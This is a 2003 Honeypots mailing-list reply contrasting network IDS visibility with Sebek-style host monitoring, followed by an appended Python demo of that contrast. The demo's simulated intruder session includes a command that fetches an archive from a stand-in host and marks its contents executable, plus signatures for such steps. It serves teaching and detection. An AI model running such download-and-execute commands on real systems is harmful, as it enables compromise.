Honeypots mailing list archives

Re: logging facility


From: "Peter Bates" <Peter.Bates () lshtm ac uk>
Date: Thu, 28 Aug 2003 11:03:52 +0100


Hello all...

<Motayyam79 () aol com> 28/08/03 01:19:09 >>>
Fine, but an IDS can be deployed on a network that doesn't have any 
production traffic.  
What logging facilities does a honeypot use that make it stronger 
than normal systems? 

As others have mentioned, part of the 'unique selling points' of honeypots are that you can monitor down to the system 
level itself, possibly using things like UML/VMware, or solutions like Sebek.

An IDS, even on a network with no production traffic (and hence a reduction in the amount of 'traffic' you have to 
analyze) will still not necessarily capture key strokes from a compromised SSH server, or IRC over SSL... you'll see 
'traffic', but not get the added benefit of being able to potentially see things from the 'outside in'.

...


--------------------------------------------------------------------------------------------------->
Peter Bates, Systems Support Officer, Network Support Team.
London School of Hygiene & Tropical Medicine.
Telephone: 0207-958 8353 / Fax: 0207-636 9838
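To illustrate the point made in the reply above (network sensors see ciphertext, a Sebek-style read() hook sees the decrypted keystrokes), here is an added Python model; it is example code written for this archive page, not code from the thread, from Sebek or from any IDS. The keystrokes, the content signatures and the session key are constructed, and the SHA-256 counter keystream is a stand-in for SSH's real encryption, used only to make the wire bytes opaque.

```python
"""Why a network IDS and a host-level honeypot sensor see different things.

Constructed scenario: an intruder types commands over an encrypted (SSH-like)
session.  The network sensor only receives ciphertext packets; a Sebek-style
hook on the kernel read() path receives the bytes after sshd has decrypted them.
The cipher below is a SHA-256 counter keystream XORed over the plaintext, which
is NOT SSH's real cryptography, just an opaque stream for the demonstration.
"""
import hashlib
import math
import re
from collections import Counter

# Constructed keystrokes, one element per interactive read() the sshd process performs.
SESSION_READS = [
    b"id\n",
    b"uname -a\n",
    b"cd /tmp && wget http://example.invalid/x.tgz\n",
    b"tar xzf x.tgz && chmod +x ./x/run\n",
]

# Constructed IDS-style content signatures (hypothetical names, not from any ruleset).
SIGNATURES = {
    "recon-uname": re.compile(rb"uname\s+-a"),
    "download-tool": re.compile(rb"wget\s+http"),
    "make-executable": re.compile(rb"chmod\s+\+x"),
}

SESSION_KEY = b"constructed-session-key"  # constructed, never reuse anything like it


def keystream(key: bytes, length: int) -> bytes:
    """Deterministic pseudo-random bytes: SHA-256 over key || 64-bit counter."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def encrypt_reads(reads, key):
    """Turn each read() buffer into one ciphertext 'packet' as it would cross the wire."""
    packets = []
    offset = 0
    for chunk in reads:
        ks = keystream(key, offset + len(chunk))[offset:]
        packets.append(bytes(p ^ k for p, k in zip(chunk, ks)))
        offset += len(chunk)
    return packets


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of the sample; encrypted data sits near the top."""
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def match_signatures(buffers, signatures):
    """Signature names that fire over a sequence of byte buffers, in order."""
    hits = []
    for buf in buffers:
        for name, pat in signatures.items():
            if pat.search(buf):
                hits.append(name)
    return hits


def network_ids_view(packets, signatures):
    """What a content-matching IDS can report: it only has the ciphertext payloads."""
    return match_signatures(packets, signatures)


def host_sensor_view(reads, signatures):
    """What a Sebek-style read() hook reports: it receives the decrypted buffers."""
    return match_signatures(reads, signatures)


def compare_views():
    """Run both sensors over the same constructed session and summarise."""
    packets = encrypt_reads(SESSION_READS, SESSION_KEY)
    wire = b"".join(packets)
    plain = b"".join(SESSION_READS)
    return {
        "network_hits": network_ids_view(packets, SIGNATURES),
        "host_hits": host_sensor_view(SESSION_READS, SIGNATURES),
        # The IDS still sees that traffic exists: packet count and sizes survive encryption.
        "packet_lengths": [len(p) for p in packets],
        "wire_entropy": round(shannon_entropy(wire), 2),
        "plaintext_entropy": round(shannon_entropy(plain), 2),
    }


if __name__ == "__main__":
    for key, value in compare_views().items():
        print(f"{key}: {value}")
```

Running it shows the network view firing no content signatures while the host view fires all three; the packet lengths survive on the wire, which is the "you'll see 'traffic'" part of the argument, and the entropy figures show why pattern matching on the ciphertext has nothing to work with.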

